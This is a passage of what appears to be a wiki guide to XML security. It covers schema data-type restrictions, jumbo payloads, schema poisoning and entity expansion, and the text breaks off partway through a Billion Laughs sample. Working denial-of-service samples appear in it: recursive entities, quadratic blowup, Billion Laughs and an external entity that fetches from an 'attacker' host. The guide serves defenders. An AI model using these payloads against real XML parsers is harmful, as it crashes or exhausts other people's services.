 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
